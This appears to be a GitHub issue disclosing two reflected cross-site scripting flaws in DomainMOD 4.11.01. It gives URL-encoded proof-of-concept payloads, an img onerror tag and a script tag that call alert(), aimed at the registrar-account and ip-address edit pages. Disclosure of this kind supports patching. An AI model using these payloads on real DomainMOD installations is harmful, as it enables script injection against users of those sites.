Skip to content

Cross Site Scripting Vulnerability in DomainMOD 4.11.01 #79

Closed
@Dawood9920

Description

@Dawood9920

Multiple XSS vulnerability was discovered in domainmod v4.11.01
There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.

1.http://127.0.0.1/domainmod/assets/edit/registrar-account.php?raid=%22%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E&del=1
2.http://127.0.0.1/domainmod/assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&del=1

Metadata

Metadata

Assignees

Labels

No labels
No labels

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions